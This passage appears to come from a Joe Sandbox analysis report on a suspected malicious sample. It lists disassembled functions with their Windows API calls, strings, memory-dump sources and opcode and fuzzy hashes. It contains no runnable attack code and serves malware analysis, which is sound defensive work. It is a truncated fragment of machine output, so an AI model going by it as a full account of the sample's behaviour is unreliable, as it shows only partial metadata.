                                          • ImageList_EndDrag.COMCTL32 ref: 00E7C2EA
                                          • ReleaseCapture.USER32 ref: 00E7C2F0
                                          • SetWindowTextW.USER32(?,00000000), ref: 00E7C39A
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E7C3AD
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E7C48F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
                                          • API String ID: 1924731296-488423084
                                          • Opcode ID: f333d35b60a40298aa59c3a6af684569efcadbca1a8e2fa4c04f37332aa97f38
                                          • Instruction ID: 310fbf4c443dd68a1c5bda10c07dbc947a4dac4246060a4d36d6745352574d99
                                          • Opcode Fuzzy Hash: f333d35b60a40298aa59c3a6af684569efcadbca1a8e2fa4c04f37332aa97f38
                                          • Instruction Fuzzy Hash: 2F51AF70204304AFD704DF14D856FBA7BE5EF88314F10852DF699AB2E1DB34A958CB62
                                          Function 00DF9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 3194e00dd52f30dcf3fc07e769b2f9e6d0f6a9e1ef4d8c45a8ccc09a15c279b6
                                          • Instruction ID: 4bef16833f6880b18c0f1d003e6da659649e5f52fd57b8c9938f9af8d0a73cb0
                                          • Opcode Fuzzy Hash: 3194e00dd52f30dcf3fc07e769b2f9e6d0f6a9e1ef4d8c45a8ccc09a15c279b6
                                          • Instruction Fuzzy Hash: 3341F971A04219AADB249F74EC42FB6B3F4EF48304F25547EE649E6181EA71D982CB21
                                          Function 00E773C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E773D9
                                          • CreateMenu.USER32 ref: 00E773F4
                                          • SetMenu.USER32(?,00000000), ref: 00E77403
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E77490
                                          • IsMenu.USER32(?), ref: 00E774A6
                                          • CreatePopupMenu.USER32 ref: 00E774B0
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E774DD
                                          • DrawMenuBar.USER32 ref: 00E774E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 29b56e7abd02afba2566fdefc0bfbfab0422d6dfde1bad4492d8d7bfa7692c38
                                          • Instruction ID: f7bddab0da508db097a6907cf282b28aa7b66efd394970038908d4b90d40138f
                                          • Opcode Fuzzy Hash: 29b56e7abd02afba2566fdefc0bfbfab0422d6dfde1bad4492d8d7bfa7692c38
                                          • Instruction Fuzzy Hash: 66414775A00209EFDB20DF65D884E9ABBF5FF49315F148029E959A7360E730AD14CB60
                                          Function 00E7772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E777CD
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00E777D4
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E777E7
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E777EF
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E777FA
                                          • DeleteDC.GDI32(00000000), ref: 00E77803
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E7780D
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E77821
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E7782D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: c54f9005e8c63a74d4122d67e0d324d1ce4588c8fbe1653abff2f62e8788b7ee
                                          • Instruction ID: c7664a4f384e6b9100005a4399aecbd219b9eec1e822f8114835557cd2b9462b
                                          • Opcode Fuzzy Hash: c54f9005e8c63a74d4122d67e0d324d1ce4588c8fbe1653abff2f62e8788b7ee
                                          • Instruction Fuzzy Hash: 0031AB32105215AFDF169FA5DC08FEA3B69FF09325F118225FA59B21A0CB31D861DBA0
                                          Function 00E17040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E1707B
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          • __gmtime64_s.LIBCMT ref: 00E17114
                                          • __gmtime64_s.LIBCMT ref: 00E1714A
                                          • __gmtime64_s.LIBCMT ref: 00E17167
                                          • __allrem.LIBCMT ref: 00E171BD
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E171D9
                                          • __allrem.LIBCMT ref: 00E171F0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E1720E
                                          • __allrem.LIBCMT ref: 00E17225
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E17243
                                          • __invoke_watson.LIBCMT ref: 00E172B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction ID: b80e1c5f409750615037fdb78c15914a46d58a7c1b705b7b93d9ce97bf1434bf
                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction Fuzzy Hash: 3471E9B1A08716ABD7149E79DC42BDAB3F4AF14B24F14522AF864F72C1E770D9808B90
                                          Function 00E52A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E52A31
                                          • GetMenuItemInfoW.USER32(00EB6890,000000FF,00000000,00000030), ref: 00E52A92
                                          • SetMenuItemInfoW.USER32(00EB6890,00000004,00000000,00000030), ref: 00E52AC8
                                          • Sleep.KERNEL32(000001F4), ref: 00E52ADA
                                          • GetMenuItemCount.USER32(?), ref: 00E52B1E
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E52B3A
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00E52B64
                                          • GetMenuItemID.USER32(?,?), ref: 00E52BA9
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E52BEF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E52C03
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E52C24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 4c6ccbb154e4e07e6484eea14596289bfa17ba8bc13297447eed23fc29e6f7da
                                          • Instruction ID: bd7afaeb03fb1ff65d5654edcfc735d256744e2b572e52f11924e83dfe666c15
                                          • Opcode Fuzzy Hash: 4c6ccbb154e4e07e6484eea14596289bfa17ba8bc13297447eed23fc29e6f7da
                                          • Instruction Fuzzy Hash: 7F619270900249AFDB21CF64D888DBEBBB8EB42309F14595DEE41B7252D731AD4DDB20
                                          Function 00E77192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E77214
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E77217
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7723B
                                          • _memset.LIBCMT ref: 00E7724C
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E7725E
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E772D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: 3f0a0bbcc9e7e3e09fe278114f5f20bbd86d2711cd32cdc96bd7b51589ea84f0
                                          • Instruction ID: 82b4337fab6d3dbcaca8e3d80f907fd036465112683eaddcd41872b2a48411ed
                                          • Opcode Fuzzy Hash: 3f0a0bbcc9e7e3e09fe278114f5f20bbd86d2711cd32cdc96bd7b51589ea84f0
                                          • Instruction Fuzzy Hash: 17616C75A00208AFDB10DFA4CC81EEE77F8EB09714F14416AFA58B72A1D774AD45DBA0
                                          Function 00E4710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E47135
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E4718E
                                          • VariantInit.OLEAUT32(?), ref: 00E471A0
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E471C0
                                          • VariantCopy.OLEAUT32(?,?), ref: 00E47213
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E47227
                                          • VariantClear.OLEAUT32(?), ref: 00E4723C
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E47249
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E47252
                                          • VariantClear.OLEAUT32(?), ref: 00E47264
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E4726F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: 38a7b471a37b2251bcfe6868127cd2534a40d0c9770c2928331000ec6829b017
                                          • Instruction ID: c7edeb019a75e4cf8039008a68c9fad59cb5cd5b50a5f8839e9780ef36df05dc
                                          • Opcode Fuzzy Hash: 38a7b471a37b2251bcfe6868127cd2534a40d0c9770c2928331000ec6829b017
                                          • Instruction Fuzzy Hash: D2416E71A04219AFCF14DF65D8489AEBBB8FF08354F008069F955B7261DB70A989CFA0
                                          Function 00E686D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • CoInitialize.OLE32 ref: 00E68718
                                          • CoUninitialize.OLE32 ref: 00E68723
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00E82BEC,?), ref: 00E68783
                                          • IIDFromString.OLE32(?,?), ref: 00E687F6
                                          • VariantInit.OLEAUT32(?), ref: 00E68890
                                          • VariantClear.OLEAUT32(?), ref: 00E688F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: bc750d91357fedae3acb560f45cc09c1b561a40bf96f798acdfce978784a3be7
                                          • Instruction ID: db26a95205866c6c2703f9d37b881f731e3bcfff6055f268277a287571ac84c0
                                          • Opcode Fuzzy Hash: bc750d91357fedae3acb560f45cc09c1b561a40bf96f798acdfce978784a3be7
                                          • Instruction Fuzzy Hash: 726104306483019FD714DF24DA44B6AB7E4EF48794F50591EF985BB291CB70ED48CBA2
                                          Function 00E65A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00E65AA6
                                          • inet_addr.WSOCK32(?,?,?), ref: 00E65AEB
                                          • gethostbyname.WSOCK32(?), ref: 00E65AF7
                                          • IcmpCreateFile.IPHLPAPI ref: 00E65B05
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E65B75
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E65B8B
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E65C00
                                          • WSACleanup.WSOCK32 ref: 00E65C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: ac584679373de5289d886dce7d2304efd139ba1144cffe5b0fce2f0be5485e87
                                          • Instruction ID: f58c92358feb2ea4277f7763511bb4ede043903aa5f2d2f7f2d0de9690c6214e
                                          • Opcode Fuzzy Hash: ac584679373de5289d886dce7d2304efd139ba1144cffe5b0fce2f0be5485e87
                                          • Instruction Fuzzy Hash: F651C0326447019FD720DF25EC45B6ABBE0EF48354F049929F659EB2A1DB70E844CF12
                                          Function 00E5B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5B73B
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E5B7B1
                                          • GetLastError.KERNEL32 ref: 00E5B7BB
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00E5B828
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 22c9792613459c7255f9568a17e50e2687e7fe116a18fdc375e178beaeed3adf
                                          • Instruction ID: 7b3f7ceff181001aafaa4b28a595266b61c2fb166fb4c5b50082d405c00ee425
                                          • Opcode Fuzzy Hash: 22c9792613459c7255f9568a17e50e2687e7fe116a18fdc375e178beaeed3adf
                                          • Instruction Fuzzy Hash: E431C635A002089FCB04EF64CC89AFEB7B4EF49705F14952AF905FB291DB71994AC761
                                          Function 00E49471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E494F6
                                          • GetDlgCtrlID.USER32 ref: 00E49501
                                          • GetParent.USER32 ref: 00E4951D
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E49520
                                          • GetDlgCtrlID.USER32(?), ref: 00E49529
                                          • GetParent.USER32(?), ref: 00E49545
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E49548
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 3ac6dd2d12bf700a047f91c408e6479dd802dc370f3959ba95973d68a61cefe0
                                          • Instruction ID: ca691d362007d35067100bf6c8dd8b7d0879260e26fda6557373a0c268fb7c19
                                          • Opcode Fuzzy Hash: 3ac6dd2d12bf700a047f91c408e6479dd802dc370f3959ba95973d68a61cefe0
                                          • Instruction Fuzzy Hash: 6D21D170A00208AFCF04ABA5DC859FEBBB4EF49310F104115F621A72A2DB7599199B70
                                          Function 00E4955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E495DF
                                          • GetDlgCtrlID.USER32 ref: 00E495EA
                                          • GetParent.USER32 ref: 00E49606
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E49609
                                          • GetDlgCtrlID.USER32(?), ref: 00E49612
                                          • GetParent.USER32(?), ref: 00E4962E
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E49631
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: e00c68fe657f705b19e412d4a44e9d8edea160d4c5070ad4616f507d4b70186f
                                          • Instruction ID: 159dc9cd943ebf10bb755e171c13b5ae2475a5458ec8c12ec322e516c9bf5198
                                          • Opcode Fuzzy Hash: e00c68fe657f705b19e412d4a44e9d8edea160d4c5070ad4616f507d4b70186f
                                          • Instruction Fuzzy Hash: 0421C170A00208BFDF04ABA5DC85EFEBBB8EF48300F114055FA11B71A6DB7599599B70
                                          Function 00E49645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 00E49651
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00E49666
                                          • _wcscmp.LIBCMT ref: 00E49678
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E496F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
